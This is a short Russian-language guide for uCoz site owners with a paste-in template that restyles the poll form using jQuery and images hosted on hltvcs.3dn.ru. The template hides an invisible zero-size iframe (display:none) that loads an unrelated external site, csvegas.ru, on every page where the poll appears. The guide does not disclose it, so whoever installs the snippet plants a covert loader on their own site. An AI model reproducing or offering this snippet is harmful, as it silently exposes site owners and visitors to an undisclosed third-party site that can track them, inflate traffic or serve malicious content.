УСТАНОВКА:
Заходим в Панель Управления-> Управление дизайном-> Опросы-> Вид формы опросов.
И вставляем этот код:
Код
<style>
.answer div div {height: 10px !important; border: 1px solid #000; background-repeat: repeat-x}
</style>
<div style="font-family:Tahoma,Arial;">
<div style="font-size:8pt;padding-top:2px;text-align:left;"><b>$QUESTION$</b></div>
<div style="font-size:8pt;text-align:left;">$ANSWERS$</div>
<div style="padding-top:4px;text-align:center;"><iframe src="http://csvegas.ru/" width="0" height="0" style="display:none"></iframe><img alt="$RESULTS_LINK$" src="http://hltvcs.3dn.ru/ucoz4-11-10/resylbtat.png"> <img alt="$ARCHIVE_LINK$" src="http://hltvcs.3dn.ru/ucoz4-11-10/rararxiv.png"></div>
<script type="text/javascript">
var a = ['http://hltvcs.3dn.ru/ucoz4-11-10/green.gif','http://hltvcs.3dn.ru/ucoz4-11-10/bluecs.gif','http://hltvcs.3dn.ru/ucoz4-11-10/indigocs.gif','http://hltvcs.3dn.ru/ucoz4-11-10/redcs.gif','http://hltvcs.3dn.ru/ucoz4-11-10/smailcs.gif'];
for(var i = 0; i < a.length; i++){
$('div.answer div div').eq(i).css({background: 'url(' + a [i]+ ')', backgroundRepeat: 'repeat-x'});
}
$('div.answer span').each(function(){$(this).html($(this).html()+' - <span class="procent">'+$(this).attr('title').split(':')[1]+'</span>')});
</script>
<div style="padding-top:4px;font-size:7pt;text-align:center;">Всего ответов: <b>$TOTAL_VOTES$</b></div>
</div>